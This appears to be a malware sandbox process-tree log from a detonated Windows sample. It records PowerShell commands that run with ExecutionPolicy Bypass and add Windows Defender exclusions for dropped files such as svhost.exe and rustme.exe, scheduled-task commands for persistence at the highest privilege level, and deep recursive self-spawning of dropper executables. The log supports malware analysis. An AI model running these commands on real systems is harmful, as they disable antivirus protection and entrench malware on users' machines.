C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'нужно.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3572
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4876
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rustme.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rustme.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rustme.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3224
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\build.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4636 -
C:\Windows\system32\conhost.execonhost.exe3⤵PID:5428
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"2⤵
- Executes dropped EXE
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\авааа.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3452
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'авааа.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:6064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5388
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\ProgramData\svhost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5564
-
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\юзерок.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'юзерок.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:6048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5644
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\ProgramData\svhost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"3⤵
- Executes dropped EXE
PID:916 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"4⤵
- Executes dropped EXE
PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"4⤵
- Executes dropped EXE
PID:4316
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"5⤵
- Executes dropped EXE
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"5⤵
- Executes dropped EXE
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"6⤵
- Executes dropped EXE
PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"6⤵
- Executes dropped EXE
PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"6⤵
- Executes dropped EXE
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"7⤵
- Executes dropped EXE
PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"7⤵
- Executes dropped EXE
PID:5800
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"7⤵
- Executes dropped EXE
PID:5976 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"8⤵PID:3948
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"8⤵PID:2904
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"8⤵PID:3960
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"9⤵PID:3432
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"9⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"9⤵PID:3880
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"10⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"10⤵PID:3464
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"10⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"11⤵PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"11⤵PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"11⤵PID:2564
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"12⤵PID:5576
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"12⤵PID:5140
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"12⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"13⤵PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"13⤵PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"13⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"14⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"14⤵PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"14⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"15⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"15⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"15⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"16⤵PID:404
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"16⤵PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"16⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"17⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"17⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"17⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"18⤵PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"18⤵PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"18⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"19⤵PID:4144
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"19⤵PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"19⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"20⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"20⤵PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"20⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"21⤵PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"21⤵PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"21⤵PID:5976
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"22⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"22⤵PID:3440
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"22⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"23⤵PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"23⤵PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"23⤵
- Checks computer location settings
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"24⤵PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"24⤵PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"24⤵
- Checks computer location settings
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"25⤵PID:3644
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"25⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"25⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"26⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"26⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"26⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\авааа.exe"C:\Users\Admin\AppData\Local\Temp\авааа.exe"27⤵PID:3580
-
-
C:\Users\Admin\AppData\Local\Temp\юзерок.exe"C:\Users\Admin\AppData\Local\Temp\юзерок.exe"27⤵PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"27⤵PID:3684
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"27⤵PID:2804
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"27⤵PID:5796
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"26⤵PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"26⤵PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"25⤵PID:1572
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"25⤵PID:5072
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"24⤵PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"24⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:5848
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:5388
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:4904
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"23⤵PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"23⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:4920
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:2564
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵
- Checks computer location settings
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"32⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"33⤵PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"33⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"32⤵PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:2348
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:5824
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"22⤵PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"22⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:4748
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"21⤵PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"21⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:1976
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:2632
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:4936
-
